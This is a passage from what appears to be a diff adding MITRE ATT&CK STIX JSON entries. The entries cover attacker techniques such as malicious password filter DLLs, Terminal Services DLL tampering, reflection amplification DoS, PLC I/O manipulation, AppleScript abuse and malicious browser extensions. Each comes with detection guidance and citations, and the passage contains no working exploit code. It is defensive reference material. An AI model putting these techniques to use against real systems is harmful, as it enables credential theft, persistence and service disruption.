"LOLBAS Msiexec", + "description": "LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/" + }, + { + "source_name": "Microsoft msiexec", + "description": "Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec" + }, + { + "source_name": "Microsoft AlwaysInstallElevated 2018", + "description": "Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Login Item", + "description": "MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user's ~/Library/Preferences/ directory in a plist file called com.apple.loginitems.plist (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method SMLoginItemSetEnabled can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well (Citation: Adding Login Items).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well (Citation: Adding Login Items). Monitor process execution resulting from login actions for unusual or unknown applications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--36675cd3-fe00-454c-8516-aebecacbe9d9", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1162", + "external_id": "T1162" + }, + { + "source_name": "Adding Login Items", + "description": "Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "Malware Persistence on OS X", + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + }, + { + "source_name": "OSX.Dok Malware", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/564.html", + "external_id": "CAPEC-564" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Network Trust Dependencies", + "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", + "created": "2020-10-02T15:47:59.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590/003", + "external_id": "T1590.003" + }, + { + "source_name": "Pentesting AD Forests", + "description": "García, C. (2019, April 3). Pentesting Active Directory Forests. Retrieved October 20, 2020.", + "url": "https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:41.052Z", + "name": "Reflection Amplification", + "description": "Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "created": "2020-03-02T20:08:03.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1498/002", + "external_id": "T1498.002" + }, + { + "source_name": "Cloudflare ReflectionDoS May 2017", + "description": "Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection (attacks). Retrieved April 23, 2019.", + "url": "https://blog.cloudflare.com/reflections-on-reflections/" + }, + { + "source_name": "Cloudflare DNSamplficationDoS", + "description": "Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.", + "url": "https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/" + }, + { + "source_name": "Cloudflare NTPamplifciationDoS", + "description": "Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved April 23, 2019.", + "url": "https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/" + }, + { + "source_name": "Arbor AnnualDoSreport Jan 2018", + "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", + "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf" + }, + { + "source_name": "Cloudflare Memcrashed Feb 2018", + "description": "Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.", + "url": "https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:03.589Z", + "name": "Manipulate I/O Image", + "description": "Adversaries may manipulate the I/O image of PLCs through various means to prevent them from functioning as expected. Methods of I/O image manipulation may include overriding the I/O table via direct memory manipulation or using the override function used for testing PLC programs. (Citation: Dr. Kelvin T. Erickson December 2010) During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules. \n\nOne of the unique characteristics of PLCs is their ability to override the status of a physical discrete input or to override the logic driving a physical output coil and force the output to a desired status.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0835", + "external_id": "T0835" + }, + { + "source_name": "Dr. Kelvin T. Erickson December 2010", + "description": "Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 ", + "url": "https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Password Filter DLL", + "description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_detection": "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages) and correlate then investigate the DLL files these files reference.\n\nPassword filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "created": "2020-02-11T19:05:45.829Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/002", + "external_id": "T1556.002" + }, + { + "source_name": "Carnal Ownage Password Filters Sept 2013", + "description": "Fuller, R. (2013, September 11). Stealing passwords every time they change. Retrieved November 21, 2017.", + "url": "http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html" + }, + { + "source_name": "Clymb3r Function Hook Passwords Sept 2013", + "description": "Bialek, J. (2013, September 15). Intercepting Password Changes With Function Hooking. Retrieved November 21, 2017.", + "url": "https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Terminal Services DLL", + "description": "Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)\n\n[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a \"generic\" process (ex: svchost.exe) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll.(Citation: Microsoft System Services Fundamentals) The termsrv.dll file, typically stored in `%SystemRoot%\\System32\\`, is the default ServiceDll value for Terminal Services in `HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\`.\n\nAdversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll file or modifying the ServiceDll value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for changes to Registry keys associated with ServiceDll and other subkey values under HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\.\n\nMonitor unexpected changes and/or interactions with termsrv.dll, which is typically stored in %SystemRoot%\\System32\\.\n\nMonitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe) or modify/replace the legitimate termsrv.dll.\n\nMonitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs) for unexpected DLLs (the default is %SystemRoot%\\System32\\termsrv.dll, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", + "created": "2022-03-28T15:34:44.590Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/005", + "external_id": "T1505.005" + }, + { + "source_name": "James TermServ DLL", + "description": "James. (2019, July 14). @James_inthe_box. Retrieved March 28, 2022.", + "url": "https://twitter.com/james_inthe_box/status/1150495335812177920" + }, + { + "source_name": "Microsoft System Services Fundamentals", + "description": "Microsoft. (2018, February 17). Windows System Services Fundamentals. Retrieved March 28, 2022.", + "url": "https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx" + }, + { + "source_name": "Microsoft Remote Desktop Services", + "description": "Microsoft. (2019, August 23). About Remote Desktop Services. Retrieved March 28, 2022.", + "url": "https://docs.microsoft.com/windows/win32/termserv/about-terminal-services" + }, + { + "source_name": "RDPWrap Github", + "description": "Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M. Retrieved March 28, 2022.", + "url": "https://github.com/stascorp/rdpwrap" + }, + { + "source_name": "Windows OS Hub RDP", + "description": "Windows OS Hub. (2021, November 10). How to Allow Multiple RDP Sessions in Windows 10 and 11?. Retrieved March 28, 2022.", + "url": "http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T19:06:05.126Z", + "name": "AppleScript", + "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)\n\nAppleScripts do not need to call osascript to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Phil Stokes, SentinelOne" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb", + "created": "2020-03-09T14:07:54.329Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/002", + "external_id": "T1059.002" + }, + { + "source_name": "Apple AppleScript", + "description": "Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020.", + "url": "https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html" + }, + { + "source_name": "SentinelOne macOS Red Team", + "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.", + "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/" + }, + { + "source_name": "SentinelOne AppleScript", + "description": "Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.", + "url": "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/" + }, + { + "source_name": "Macro Malware Targets Macs", + "description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:03.783Z", + "name": "Network Sniffing", + "description": "Network sniffing is the practice of using a network interface on a computer system to monitor or capture information (Citation: Enterprise ATT&CK January 2018) regardless of whether it is the specified destination for the information. \n\nAn adversary may attempt to sniff the traffic to gain information about the target. This information can vary in the level of importance. Relatively unimportant information is general communications to and from machines. Relatively important information would be login information. User credentials may be sent over an unencrypted protocol, such as Telnet, that can be captured and obtained through network packet analysis. \n\nIn addition, ARP and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0842", + "external_id": "T0842" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Network Sniffing Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-18T23:22:37.874Z", + "name": "Browser Extensions", + "description": "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)\n\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.\n\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)\n\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)\n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Chris Ross @xorrior", + "Justin Warner, ICEBRG", + "Manikantan Srinivasan, NEC Corporation India" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.\n\nMonitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.\n\nOn macOS, monitor the command line for usage of the profiles tool, such as profiles install -type=configuration. Additionally, all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1176", + "external_id": "T1176" + }, + { + "source_name": "Chrome Extension Crypto Miner", + "description": "Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.", + "url": 